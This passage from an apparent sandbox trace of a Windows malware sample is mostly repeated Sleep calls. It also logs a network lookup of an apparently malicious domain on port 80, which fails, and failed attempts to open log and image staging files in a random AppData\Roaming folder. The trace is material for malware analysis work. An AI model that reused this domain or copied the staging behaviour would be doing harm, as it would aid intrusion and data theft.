(dwMilliseconds=0x7d0) [0204.400] Sleep (dwMilliseconds=0x7d0) [0204.401] Sleep (dwMilliseconds=0x7d0) [0204.403] Sleep (dwMilliseconds=0x7d0) [0204.405] Sleep (dwMilliseconds=0x7d0) [0204.407] Sleep (dwMilliseconds=0x7d0) [0204.408] Sleep (dwMilliseconds=0x7d0) [0204.410] Sleep (dwMilliseconds=0x7d0) [0204.412] Sleep (dwMilliseconds=0x7d0) [0204.414] Sleep (dwMilliseconds=0x7d0) [0204.416] Sleep (dwMilliseconds=0x7d0) [0204.417] Sleep (dwMilliseconds=0x7d0) [0204.419] Sleep (dwMilliseconds=0x7d0) [0204.420] Sleep (dwMilliseconds=0x7d0) [0204.422] Sleep (dwMilliseconds=0x7d0) [0204.423] Sleep (dwMilliseconds=0x7d0) [0204.425] Sleep (dwMilliseconds=0x7d0) [0204.426] Sleep (dwMilliseconds=0x7d0) [0204.428] Sleep (dwMilliseconds=0x7d0) [0204.429] Sleep (dwMilliseconds=0x7d0) [0204.431] Sleep (dwMilliseconds=0x7d0) [0204.432] Sleep (dwMilliseconds=0x7d0) [0204.434] Sleep (dwMilliseconds=0x7d0) [0204.435] Sleep (dwMilliseconds=0x7d0) [0204.437] Sleep (dwMilliseconds=0x7d0) [0204.438] Sleep (dwMilliseconds=0x7d0) [0204.440] Sleep (dwMilliseconds=0x7d0) [0204.441] Sleep (dwMilliseconds=0x7d0) [0204.443] Sleep (dwMilliseconds=0x7d0) [0204.444] Sleep (dwMilliseconds=0x7d0) [0204.446] Sleep (dwMilliseconds=0x7d0) [0204.447] Sleep (dwMilliseconds=0x7d0) [0204.450] Sleep (dwMilliseconds=0x7d0) [0204.451] Sleep (dwMilliseconds=0x7d0) [0204.453] Sleep (dwMilliseconds=0x7d0) [0204.454] Sleep (dwMilliseconds=0x7d0) [0204.457] Sleep (dwMilliseconds=0x7d0) [0204.463] Sleep (dwMilliseconds=0x7d0) [0204.498] Sleep (dwMilliseconds=0x7d0) [0204.499] Sleep (dwMilliseconds=0x7d0) [0204.526] Sleep (dwMilliseconds=0x7d0) [0204.528] Sleep (dwMilliseconds=0x7d0) [0204.529] Sleep (dwMilliseconds=0x7d0) [0204.530] Sleep (dwMilliseconds=0x7d0) [0204.532] Sleep (dwMilliseconds=0x7d0) [0204.533] Sleep (dwMilliseconds=0x7d0) [0204.535] Sleep (dwMilliseconds=0x7d0) [0204.540] Sleep (dwMilliseconds=0x7d0) [0204.541] Sleep (dwMilliseconds=0x7d0) [0204.542] Sleep (dwMilliseconds=0x7d0) [0204.544] Sleep (dwMilliseconds=0x7d0) [0204.545] Sleep (dwMilliseconds=0x7d0) [0204.549] Sleep (dwMilliseconds=0x7d0) [0204.551] Sleep (dwMilliseconds=0x7d0) [0204.553] Sleep (dwMilliseconds=0x7d0) [0204.554] Sleep (dwMilliseconds=0x7d0) [0204.556] Sleep (dwMilliseconds=0x7d0) [0204.557] Sleep (dwMilliseconds=0x7d0) [0204.559] Sleep (dwMilliseconds=0x7d0) [0204.560] Sleep (dwMilliseconds=0x7d0) [0204.561] Sleep (dwMilliseconds=0x7d0) [0204.563] Sleep (dwMilliseconds=0x7d0) [0204.564] Sleep (dwMilliseconds=0x7d0) [0204.566] Sleep (dwMilliseconds=0x7d0) [0204.567] Sleep (dwMilliseconds=0x7d0) [0204.572] Sleep (dwMilliseconds=0x7d0) [0204.574] Sleep (dwMilliseconds=0x7d0) [0204.576] Sleep (dwMilliseconds=0x7d0) [0204.577] Sleep (dwMilliseconds=0x7d0) [0204.579] Sleep (dwMilliseconds=0x7d0) [0204.582] Sleep (dwMilliseconds=0x7d0) [0204.584] Sleep (dwMilliseconds=0x7d0) [0204.627] Sleep (dwMilliseconds=0x7d0) [0204.643] Sleep (dwMilliseconds=0x7d0) [0204.645] Sleep (dwMilliseconds=0x7d0) [0204.646] Sleep (dwMilliseconds=0x7d0) [0204.648] Sleep (dwMilliseconds=0x7d0) [0204.649] Sleep (dwMilliseconds=0x7d0) [0204.651] Sleep (dwMilliseconds=0x7d0) [0204.652] Sleep (dwMilliseconds=0x7d0) [0204.654] Sleep (dwMilliseconds=0x7d0) [0204.656] Sleep (dwMilliseconds=0x7d0) [0204.660] Sleep (dwMilliseconds=0x7d0) [0204.662] Sleep (dwMilliseconds=0x7d0) [0204.663] Sleep (dwMilliseconds=0x7d0) [0204.665] Sleep (dwMilliseconds=0x7d0) [0204.666] Sleep (dwMilliseconds=0x7d0) [0204.670] Sleep (dwMilliseconds=0x7d0) [0204.672] Sleep (dwMilliseconds=0x7d0) [0204.673] Sleep (dwMilliseconds=0x7d0) [0204.675] Sleep (dwMilliseconds=0x7d0) [0204.676] Sleep (dwMilliseconds=0x7d0) [0204.678] Sleep (dwMilliseconds=0x7d0) [0204.682] Sleep (dwMilliseconds=0x7d0) [0204.683] Sleep (dwMilliseconds=0x7d0) [0204.685] Sleep (dwMilliseconds=0x7d0) [0204.686] Sleep (dwMilliseconds=0x7d0) [0204.688] Sleep (dwMilliseconds=0x7d0) [0204.689] Sleep (dwMilliseconds=0x7d0) [0204.691] Sleep (dwMilliseconds=0x7d0) [0204.692] Sleep (dwMilliseconds=0x7d0) [0204.694] Sleep (dwMilliseconds=0x7d0) [0204.695] Sleep (dwMilliseconds=0x7d0) [0204.697] Sleep (dwMilliseconds=0x7d0) [0204.698] Sleep (dwMilliseconds=0x7d0) [0204.702] Sleep (dwMilliseconds=0x7d0) [0204.704] Sleep (dwMilliseconds=0x7d0) [0204.705] socket (af=2, type=1, protocol=6) returned 0x1aa8 [0204.706] getaddrinfo (in: pNodeName="www.protocolohfresco.site", pServiceName="80", pHints=0x9e77dd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e77e08 | out: ppResult=0x9e77e08*=0x0) returned 11001 [0204.717] Sleep (dwMilliseconds=0x7d0) [0204.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.718] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.718] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0204.719] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.719] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.719] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.719] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.719] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.719] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.719] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6ed0) returned 1 [0204.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.719] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.719] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.719] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.720] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.720] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.720] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.720] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.720] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.720] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.720] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.720] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.720] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.720] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.721] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0204.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.721] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.721] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.721] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6ed0) returned 1 [0204.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.721] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.721] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0204.721] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f71a0) returned 1 [0204.721] Sleep (dwMilliseconds=0x7d0) [0204.722] Sleep (dwMilliseconds=0x7d0) [0204.725] Sleep (dwMilliseconds=0x7d0) [0204.726] Sleep (dwMilliseconds=0x7d0) [0204.728] Sleep (dwMilliseconds=0x7d0) [0204.729] Sleep (dwMilliseconds=0x7d0) [0204.731] Sleep (dwMilliseconds=0x7d0) [0204.732] Sleep (dwMilliseconds=0x7d0) [0204.736] Sleep (dwMilliseconds=0x7d0) [0204.737] Sleep (dwMilliseconds=0x7d0) [0204.739] Sleep (dwMilliseconds=0x7d0) [0204.740] Sleep (dwMilliseconds=0x7d0) [0204.742] Sleep (dwMilliseconds=0x7d0) [0204.743] Sleep (dwMilliseconds=0x7d0) [0204.747] Sleep (dwMilliseconds=0x7d0) [0204.748] Sleep (dwMilliseconds=0x7d0) [0204.795] Sleep (dwMilliseconds=0x7d0) [0204.796] Sleep (dwMilliseconds=0x7d0) [0204.798] Sleep (dwMilliseconds=0x7d0) [0204.799] Sleep (dwMilliseconds=0x7d0) [0204.802] Sleep (dwMilliseconds=0x7d0) [0204.804] Sleep (dwMilliseconds=0x7d0) [0204.805] Sleep (dwMilliseconds=0x7d0) [0204.807] Sleep (dwMilliseconds=0x7d0) [0204.808] Sleep (dwMilliseconds=0x7d0) [0204.810] Sleep (dwMilliseconds=0x7d0) [0204.811] Sleep (dwMilliseconds=0x7d0) [0204.813] Sleep (dwMilliseconds=0x7d0) [0204.814] Sleep (dwMilliseconds=0x7d0) [0204.816] Sleep (dwMilliseconds=0x7d0) [0204.817] Sleep (dwMilliseconds=0x7d0) [0204.819] Sleep (dwMilliseconds=0x7d0) [0204.828] Sleep (dwMilliseconds=0x7d0) [0204.830] Sleep (dwMilliseconds=0x7d0) [0204.832] Sleep (dwMilliseconds=0x7d0) [0204.835] Sleep (dwMilliseconds=0x7d0) [0204.836] Sleep (dwMilliseconds=0x7d0) [0204.838] Sleep (dwMilliseconds=0x7d0) [0204.839] Sleep (dwMilliseconds=0x7d0) [0204.841] Sleep (dwMilliseconds=0x7d0) [0204.842] Sleep (dwMilliseconds=0x7d0) [0204.844] Sleep (dwMilliseconds=0x7d0) [0204.847] Sleep (dwMilliseconds=0x7d0) [0204.848] Sleep (dwMilliseconds=0x7d0) [0204.850] Sleep (dwMilliseconds=0x7d0) [0204.851] Sleep (dwMilliseconds=0x7d0) [0204.853] Sleep (dwMilliseconds=0x7d0) [0204.854] Sleep (dwMilliseconds=0x7d0) [0204.856] Sleep (dwMilliseconds=0x7d0) [0204.857] Sleep (dwMilliseconds=0x7d0) [0204.859] Sleep (dwMilliseconds=0x7d0) [0204.860] Sleep (dwMilliseconds=0x7d0) [0204.862] Sleep (dwMilliseconds=0x7d0) [0204.863] Sleep (dwMilliseconds=0x7d0) [0204.865] Sleep (dwMilliseconds=0x7d0) [0204.869] Sleep (dwMilliseconds=0x7d0) [0204.870] Sleep (dwMilliseconds=0x7d0) [0204.872] Sleep (dwMilliseconds=0x7d0) [0204.873] Sleep (dwMilliseconds=0x7d0) [0204.875] Sleep (dwMilliseconds=0x7d0) [0204.879] Sleep (dwMilliseconds=0x7d0) [0204.880] Sleep (dwMilliseconds=0x7d0) [0204.882] Sleep (dwMilliseconds=0x7d0) [0204.883] Sleep (dwMilliseconds=0x7d0) [0204.885] Sleep (dwMilliseconds=0x7d0) [0204.886] Sleep (dwMilliseconds=0x7d0) [0204.888] Sleep (dwMilliseconds=0x7d0) [0204.889] Sleep (dwMilliseconds=0x7d0) [0204.891] Sleep (dwMilliseconds=0x7d0) [0204.892] Sleep (dwMilliseconds=0x7d0) [0204.894] Sleep (dwMilliseconds=0x7d0) [0204.895] Sleep (dwMilliseconds=0x7d0) [0204.897] Sleep (dwMilliseconds=0x7d0) [0204.898] Sleep (dwMilliseconds=0x7d0) [0204.902] Sleep (dwMilliseconds=0x7d0) [0204.904] Sleep (dwMilliseconds=0x7d0) [0204.905] Sleep (dwMilliseconds=0x7d0) [0204.907] Sleep (dwMilliseconds=0x7d0) [0204.908] Sleep (dwMilliseconds=0x7d0) [0204.910] Sleep (dwMilliseconds=0x7d0) [0204.913] Sleep (dwMilliseconds=0x7d0) [0204.915] Sleep (dwMilliseconds=0x7d0) [0204.916] Sleep (dwMilliseconds=0x7d0) [0204.918] Sleep (dwMilliseconds=0x7d0) [0204.919] Sleep (dwMilliseconds=0x7d0) [0204.923] Sleep (dwMilliseconds=0x7d0) [0204.926] Sleep (dwMilliseconds=0x7d0) [0204.927] Sleep (dwMilliseconds=0x7d0) [0204.929] Sleep (dwMilliseconds=0x7d0) [0204.930] Sleep (dwMilliseconds=0x7d0) [0204.932] Sleep (dwMilliseconds=0x7d0) [0204.933] Sleep (dwMilliseconds=0x7d0) [0204.935] Sleep (dwMilliseconds=0x7d0) [0204.936] Sleep (dwMilliseconds=0x7d0) [0204.941] Sleep (dwMilliseconds=0x7d0) [0204.994] Sleep (dwMilliseconds=0x7d0) [0205.051] Sleep (dwMilliseconds=0x7d0) [0205.101] Sleep (dwMilliseconds=0x7d0) [0205.156] Sleep (dwMilliseconds=0x7d0) [0205.172] Sleep (dwMilliseconds=0x7d0) [0205.241] Sleep (dwMilliseconds=0x7d0) [0205.304] Sleep (dwMilliseconds=0x7d0) [0205.358] Sleep (dwMilliseconds=0x7d0) [0205.413] Sleep (dwMilliseconds=0x7d0) [0205.424] Sleep (dwMilliseconds=0x7d0) [0205.477] Sleep (dwMilliseconds=0x7d0) [0205.559] Sleep (dwMilliseconds=0x7d0) [0205.623] Sleep (dwMilliseconds=0x7d0) [0205.651] Sleep (dwMilliseconds=0x7d0) [0205.675] Sleep (dwMilliseconds=0x7d0) [0205.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.722] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.722] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0205.722] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f71a0) returned 1 [0205.723] 